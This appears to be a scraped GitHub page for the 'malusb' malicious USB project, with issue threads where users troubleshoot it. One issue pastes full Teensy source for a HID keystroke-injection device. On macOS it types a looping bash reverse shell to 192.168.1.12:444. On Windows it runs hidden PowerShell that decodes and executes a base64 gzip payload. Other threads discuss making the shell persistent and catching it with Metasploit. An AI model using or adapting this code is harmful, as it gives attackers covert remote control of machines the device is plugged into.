ebursztein / malusb Goto Github PK

View Code? Open in Web Editor NEW

169.0 169.0 34.0 15 KB

Malicious USB

License: GNU Lesser General Public License v3.0

C 76.41% Python 16.03% Shell 0.92% PostScript 6.64%

malusb's People

Contributors

Stargazers

Watchers

malusb's Issues

Shell not persistent

Hello,
thank you for your great work!
I was testing your HID-exploit on my windows 10 machine and it successfully spawned a reverse shell on my linux machine running metasploit.
The only problem I have is, that my shell is not persistent (as it should be, right?). After rebooting my windows 10 PC the shell isn't connecting back. I have to plug in the teensy again to get a new shell.

Did I do something wrong while compiling and loading it on my teensy? Is it a windows 10 problem?
Or did I misunderstood the "persistent" part? I thought the shell would try to reconnect periodically.

Greetings!

Problems verifying configured payload code in Arduino

I created a payload_configured.c and copy pasted code into Arduino. When I hit verify to upload it to Teeny3.2 it throws the following errors:

Arduino: 1.6.11 (Linux), TD: 1.30, Board: "Teensy 3.2 / 3.1, Serial + Keyboard + Mouse + Joystick, 96 MHz optimize speed (overclock), US English"

/root/Arduino/custommalusb1/custommalusb1.ino:20:27: warning: missing terminating " character [enabled by default]
 const char* OSX_PAYLOAD = "(nohup bash -c \"while true;do bash -i >& /dev/tcp/192.168.1.12/444 0>&1 2>&1; sleep 1;done\" 1>/dev/null &)
                           ^
custommalusb1:20: error: missing terminating " character
 const char* OSX_PAYLOAD = "(nohup bash -c \"while true;do bash -i >& /dev/tcp/192.168.1.12/444 0>&1 2>&1; sleep 1;done\" 1>/dev/null &)
 ^
/root/Arduino/custommalusb1/custommalusb1.ino:21:1: warning: missing terminating " character [enabled by default]
 ";
 ^
custommalusb1:21: error: missing terminating " character
/root/Arduino/custommalusb1/custommalusb1.ino:22:28: warning: missing terminating " character [enabled by default]
 const char* WIN_PAYLOAD  = "powershell -exec bypass -nop -W hidden -noninteractive -Command \"& {$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIALRP5FcAA41S0WrbMBR991doRhsyjoUdwugCKts8bwRKaupAH0Igtnyp3chSkOQmoe2/V04T
                            ^
custommalusb1:22: error: missing terminating " character
 const char* WIN_PAYLOAD  = "powershell -exec bypass -nop -W hidden -noninteractive -Command \"& {$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIALRP5FcAA41S0WrbMBR991doRhsyjoUdwugCKts8bwRKaupAH0Igtnyp3chSkOQmoe2/V04T
 ^
/root/Arduino/custommalusb1/custommalusb1.ino:29:53: warning: missing terminating ' character [enabled by default]
 k3c9EeL9514Yi0sZGfpX9KZxqu4zcZoKZeBYvAGau6rY2wIAAA=='));$t=(New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();IEX $t }\";exit";
                                                     ^
custommalusb1:29: error: missing terminating ' character
 k3c9EeL9514Yi0sZGfpX9KZxqu4zcZoKZeBYvAGau6rY2wIAAA=='));$t=(New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();IEX $t }\";exit";
 ^
custommalusb1:22: error: expected primary-expression before 'const'
 const char* WIN_PAYLOAD  = "powershell -exec bypass -nop -W hidden -noninteractive -Command \"& {$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIALRP5FcAA41S0WrbMBR991doRhsyjoUdwugCKts8bwRKaupAH0Igtnyp3chSkOQmoe2/V04T
 ^
custommalusb1: In function 'void win_payload()':
custommalusb1:366: error: 'WIN_PAYLOAD' was not declared in this scope
   type_command(WIN_PAYLOAD);
                ^
missing terminating " character

This report would have more information with
"Show verbose output during compilation"
option enabled in File -> Preferences.

This is the payload code:

[code]
/*
 * Malicious HID USB payload
 * https://github.com/LightWind/malusb
 *
 * Malicious chimera HID payload that create a background reverse shell to the server of your choice
 * Works both on Windows and OSX. See the README to know how to configure it.
 *
 * @see: https://www.elie.net/malusb for more information on HID spoofing devices.
 * @authors Elie Bursztein ([email protected]),  Jean Michel Picod ([email protected])
 * @licence: GPL v3
 */

#include <stdio.h>

/////////////////////////////////////////////////
/// Reverse shell payloads
/////////////////////////////////////////////////

/* Those payloads stub need to be replaced with actual payloads to work */
const char* OSX_PAYLOAD = "(nohup bash -c \"while true;do bash -i >& /dev/tcp/192.168.1.12/444 0>&1 2>&1; sleep 1;done\" 1>/dev/null &)
";
const char* WIN_PAYLOAD  = "powershell -exec bypass -nop -W hidden -noninteractive -Command \"& {$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIALRP5FcAA41S0WrbMBR991doRhsyjoUdwugCKts8bwRKaupAH0Igtnyp3chSkOQmoe2/V04T
GH0I1ZPu1TlH5+oo14qDMejZw52qewGG/SSBhzmbwy66rR6BW1QcjIWOzsHSQvENWEMXaZ6KFqQl
fvJjTJPvVzShydgfTSYTRzcMc/oPbGE1lJ0TXFYHC8vVClcspnQcu/Xy9Tl+9XDNyNLC3lKQXNWt
fFhNp7+KdDYLBoHfjmaIf9/KWu0MytUOdNGAEEj3Ujo0Kg3qDWjkhxjk03TYy7KD0EdKnptcddve
ng/WMpOP6vCFruVa+oNbeq9bCwTXo3iEa3oD8sE2wSe95YW7hrg6ulG8tK2SAc1L24T+9SXxXdMK
IAS3zEHuoKwJrgZEdUYEKJKA4sBz2WT/xxEtDluYu1HOwSwGi0df2cmnh/8wnJ0ScPVJu3V+NozM
5JPaQJTtt9pl7wyjKFVdV8oa4RqNr78l6AXd9jZ6JzuSYHgTXpoU+R7eM4JBa6WX8eqjwLFPuYBS
k3c9EeL9514Yi0sZGfpX9KZxqu4zcZoKZeBYvAGau6rY2wIAAA=='));$t=(New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();IEX $t }\";exit";

/////////////////////////////////////////////////
/// Internal constants
/////////////////////////////////////////////////

#define NUMLOCK 1
#define CAPSLOCK 2
#define SCROLLLOCK 4
#define LED_PIN 11 // Teensy pin for the led.


#define LOCK_KEY CAPSLOCK // Key used for testing end of command execution. NUMLOCK or CAPSLOCK or SCROLLLOCK.
#define LOCK_CHECK_WAIT_MS 100 // Time between lock checks in ms
#define LOCK_ATTEMPTS 10 // attempts to load the driver


#define DELAY 500 // delay between command

/////////////////////////////////////////////////
/// Lock related functions
/////////////////////////////////////////////////

/*!
 * Check the state of the lock key used for locking mechanism.
 */
boolean is_locked(void) {
  if ((keyboard_leds & LOCK_KEY) == LOCK_KEY) {
    return true;
  } else {
    return false;
  }
}


/*!
 * Toggle the selected locked key stats.
 */
void toggle_lock(void) {
  unsigned short k;
  switch(LOCK_KEY) {
    case NUMLOCK:
      k = KEY_NUM_LOCK;
      break;
    case CAPSLOCK:
      k = KEY_CAPS_LOCK;
      break;
    case SCROLLLOCK:
      k = KEY_SCROLL_LOCK;
      break;
    default:
      break;
  }
  set_key(1, k);
  type_keys();
}


/*!
 * reset lock to unlock
 */
void reset_lock(void) {
  if (is_locked()) {
    toggle_lock();
  }
}

/////////////////////////////////////////////////
/// Utility functions
/////////////////////////////////////////////////

/*
 * Fingerprint OSX vs Win/Linux based on the fact that OSX don't have scrollnum
 * Idea: Try to toggle and if no change then it is OSX else Win or OSX
 */
boolean is_osx() {
  int status1 = 0; //LED status before toggle
  int status2 = 0; //LED status after toggle
  unsigned short sk  = NUMLOCK;
  // Get status
  status1 = ((keyboard_leds & sk) == sk) ? 1 : 0;
  delay(DELAY);

  //Toggle
  set_key(1, sk);
  type_keys();

  // Get status
  status2 = ((keyboard_leds & sk) == sk) ? 1 : 0;
  clear_keys();
  is_done();

  if (status1 == status2) {
    return true;
  } else {
    return false;
  }
}


void set_modifier(unsigned short m) {
  Keyboard.set_modifier(m);
}

/*!
 * Set keyboard key values
 * @param position: the position of the key in [1, 6]
 * @param value: the key value
 */

void set_key(unsigned short position, unsigned short value) {
  switch(position) {
    case 1:
      Keyboard.set_key1(value);
      break;
    case 2:
      Keyboard.set_key2(value);
      break;
    case 3:
      Keyboard.set_key3(value);
      break;
    case 4:
      Keyboard.set_key4(value);
      break;
    case 5:
      Keyboard.set_key5(value);
      break;
    case 6:
      Keyboard.set_key6(value);
      break;
    default:
      break;
  }
}

/*!
 * Type the given key combination
 * type/write the keys, clear and wait to be succesful
 * @return if the command succeeded or not
 */
void type_keys(void) {
  Keyboard.send_now();
  clear_keys();
  delay(DELAY);
}

/*!
 * Type a command line including "ENTER"
 * type/write the keys, clear and wait to be succesful
 * @return if the command succeeded or not
 */
void type_command(const char* cmd) {
  Keyboard.print(cmd);
  Keyboard.send_now();
  delay(DELAY);

  Keyboard.println("");
  Keyboard.send_now();
  delay(DELAY * 4);
  clear_keys();
}


/*!
 * clear keyboard
 * return true if sucessful
 */
void clear_keys (void){

  // reset all keys
  for (int i = 1; i < 7; i++)
    set_key(i, 0);

  // reset modifier
  set_modifier(0);
  Keyboard.send_now();
  delay(DELAY);
}

/*!
 * Wait until the drivers are load and the teensy active.
 *
 * The idea behind this is to try to get the onboard light to blink
 * and then try to lock our lock key. If both succeed then we are ready
 *
 * @note: Idea from Offsec Peensy code
 */
void wait_for_drivers(void) {
    //until we are ready
    for(int i = 0; i < LOCK_ATTEMPTS && (!is_locked()); i++) {
        digitalWrite(LED_PIN, HIGH);
        digitalWrite(LED_PIN, LOW);
        delay(LOCK_CHECK_WAIT_MS);
        toggle_lock();
      }

    // maybe it is seen as a new keyboard, evading
    if (!is_locked()) {
      osx_close_windows();
    }

    //reseting lock
    reset_lock();
    delay(100);
}


/*!
 * Check if a commad is sucessful by testing the lock key
 */
void is_done (void) {
  //for(int i = 0; i < LOCK_ATTEMPTS && (!is_locked()); i++) {
  boolean current_lock = is_locked();
  toggle_lock();
  while(is_locked() == current_lock) {
    delay(LOCK_CHECK_WAIT_MS);
  }
  reset_lock();
}


/////////////////////////////////////////////////
/// Payload functions
/////////////////////////////////////////////////
/*
char* build_payload(const char* payload_template) {
  bzero(payload_osx, PAYLOAD_OSX_SIZE);
  snprintf(payload_osx, PAYLOAD_OSX_SIZE, payload_template, MSF_IP, MSF_PORT);
  return payload_osx;
}
*/

/////////////////////////////////////////////////
/// OSX functions
/////////////////////////////////////////////////

/** open terminal **/
void osx_close_windows(void) {
  set_modifier(MODIFIERKEY_RIGHT_GUI);
  set_key(1, KEY_Q);
  type_keys();
}

/** open spotlight application to launch other apps **/
void osx_open_spotlight(void) {
  set_modifier(MODIFIERKEY_RIGHT_GUI);
  set_key(1, KEY_SPACE);
  type_keys();
}

void osx_hide_windows(void) {
  // minimize background windows
  set_modifier(MODIFIERKEY_RIGHT_GUI | MODIFIERKEY_ALT);
  set_key(1, KEY_H);
  type_keys();

  // minimize active windows
  set_modifier(MODIFIERKEY_RIGHT_GUI | MODIFIERKEY_ALT);
  set_key(1, KEY_M);
  type_keys();

  // minimize active windows
  set_modifier(MODIFIERKEY_RIGHT_GUI | MODIFIERKEY_ALT);
  set_key(1, KEY_M);
  set_key(2, KEY_H);
  type_keys();
}

/** OSX payload delivery **/
void osx_exec_payload(void) {
  //hide all the window
  osx_hide_windows();

  //spotlight
  osx_open_spotlight();

  //terminal
  type_command("terminal");

  //payload
  type_command(OSX_PAYLOAD);

  //cleanup
  osx_close_windows();
}

/////////////////////////////////////////////////
/// Windows functions
/////////////////////////////////////////////////

/*
 * Fingerprinting technique using powershell
 * @credit NFC
 *
 */
bool fingerprint_windows(void) {
  int status1 = 0; //LED status before toggle
  int status2 = 0; //LED status after toggle
  unsigned short sk  = SCROLLLOCK;

  // Get status
  status1 = ((keyboard_leds & sk) == sk) ? 1 : 0;
  delay(DELAY);


  //Asking windows to set SCROLLLOCK
  win_open_execute();
  type_command("powershell -Command \"(New-Object -ComObject WScript.Shell).SendKeys('{SCROLLLOCK}')\"");
  delay(DELAY);

  // Get status
  status2 = ((keyboard_leds & sk) == sk) ? 1 : 0;
  is_done();

  if (status1 != status2) {
    return true;
  } else {
    return false;
  }
}


void win_open_execute(void) {
  // Windows key + R
  set_modifier(MODIFIERKEY_GUI);
  set_key(1, KEY_R);
  type_keys();
}

void win_payload(void) {
  // exex prompt
  win_open_execute();

  //cmd
  type_command("cmd");

  //run payload
  type_command(WIN_PAYLOAD);
}

/*
 * Main function
 */
void setup() {
  //wait until the key is up and ready
  wait_for_drivers();
  clear_keys();
  if (fingerprint_windows() == true) {
    win_payload();
  } else {
    osx_exec_payload();
  }
}

/*
 * Code that need to be executed repeatedly goes here
 * @note: not used as payload as one time execution.
 */
void loop() {}
[/code]

Payload won't execute on windows

The windows payload relies on that windows will somehow automatically enter the payload in a command window or in the 'run' program. However this is not how windows works.

When USB drive gets inserted, and it starts to send out the payload key strokes, it will result in nothing, or at the very best a focussed text box to receive these keystrokes. (similar issue has been reported for Mac).

To fix this on windows send a Windows-key + r key combination before the payload to open the run program dialog.

Teensy 3.2 code

The code executes on windows and OS X as expected, however, I do not get any sessions on the attacking machine after having set up a listener with osx/x64x/reverse_shell_tcp handler

Launching code in OSX fails

I've been trying to run the code in OSX but when I plug in the teensy the spotlight opens but the commands are typed in it causing it to fail. I inserted teensy while a web browser was open on computer.

Recommend Projects

React

A declarative, efficient, and flexible JavaScript library for building user interfaces.
Vue.js

🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript

TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
TensorFlow

An Open Source Machine Learning Framework for Everyone
Django

The Web framework for perfectionists with deadlines.
Laravel

A PHP framework for web artisans
D3

Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

javascript

JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
web

Some thing interesting about web. New door for the world.
server

A server is a program made to process requests and deliver data to clients.
Machine learning

Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Visualization

Some thing interesting about visualization, use data art
Game

Some thing interesting about game, make everyone happy.

Recommend Org

Facebook

We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft

Open source projects and samples from Microsoft.
Google

Google ❤️ Open Source for everyone.
Alibaba

Alibaba Open Source for everyone
D3

Data-Driven Documents codes.
Tencent

China tencent open source team.